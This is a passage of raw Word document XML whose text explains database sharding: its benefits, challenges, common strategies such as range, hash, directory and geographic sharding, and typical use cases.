        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In a sharded architecture, the failure of one shard does not impact the others. This isolation can enhance the overall availability and reliability of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D007979" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cost Efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7640F9C9" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Instead of upgrading to more powerful and expensive hardware, sharding allows organizations to use multiple less expensive servers to handle the load, potentially reducing costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BB8443" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Challenges of Database Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CDDC12" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7580A7A8" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementing and managing a sharded database is more complex than managing a single monolithic database. It requires careful planning, particularly in selecting the shard key, managing distributed transactions, and ensuring data consistency across shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ACC174" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cross-Shard Joins</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75866EDB" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Queries that need to join data across multiple shards can be inefficient and complex to execute. These cross-shard queries may require additional logic to aggregate results from different shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4157C118" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E97812C" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>As data grows, shards may become unbalanced. Rebalancing shards (redistributing data) can be challenging and may require downtime or impact performance during the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75434B73" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Increased Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B26C25" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In a distributed system, data might be spread across geographically dispersed shards, leading to increased network latency for certain operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB9A8A" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Distributed Transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D946477" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handling transactions that span multiple shards can be difficult and may require using distributed transaction protocols, which can add overhead and complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF1C3F" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Common Sharding Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B6FD5" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Range-Based Sharding</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0E1B24"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data is partitioned into ranges based on the shard key. For example, users with IDs 1-1000 might go to shard 1, and users with IDs 1001-2000 might go to shard 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773408F8"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 Simple to implement, good for sequential data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22490A95"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 Can lead to uneven data distribution (e.g., one shard could become a hotspot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6727AC9A" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Hash-Based Sharding</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78156BCE"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The shard key is passed through a hash function, and the result determines the shard. This method ensures a more even distribution of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D5B233"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 Prevents hotspots, good for uniformly distributed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69222BD0"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 Harder to predict where data is stored, making range queries difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF7A9DF" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Directory-Based Sharding</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3CABA6"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A lookup table (directory) maps each key to a specific shard. This allows for flexible and customizable shard allocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5891DEC3"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 Flexibility in managing data distribution, easier rebalancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1BC869"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cons</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Directory lookup adds an additional layer of complexity and potential performance overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E461BA" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Geographical Sharding</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F85E088"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data is partitioned based on geographic location. For instance, users from Europe might be stored on one shard, while users from Asia are stored on another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E039194"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pros</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Reduces latency by keeping data closer to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F4C23E" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cons</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Potential data imbalance if one region has more users or activity than others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCC9872" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Cases for Database Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0111AD" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Large-Scale Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0FDF88" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Applications with massive amounts of data (e.g., social media platforms, e-commerce sites) often use sharding to scale and manage their data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF3B65" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Geographically Distributed Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E968D78" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Systems that serve users across the globe can use geographic sharding to reduce latency and improve user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE377E" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Multi-Tenant Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
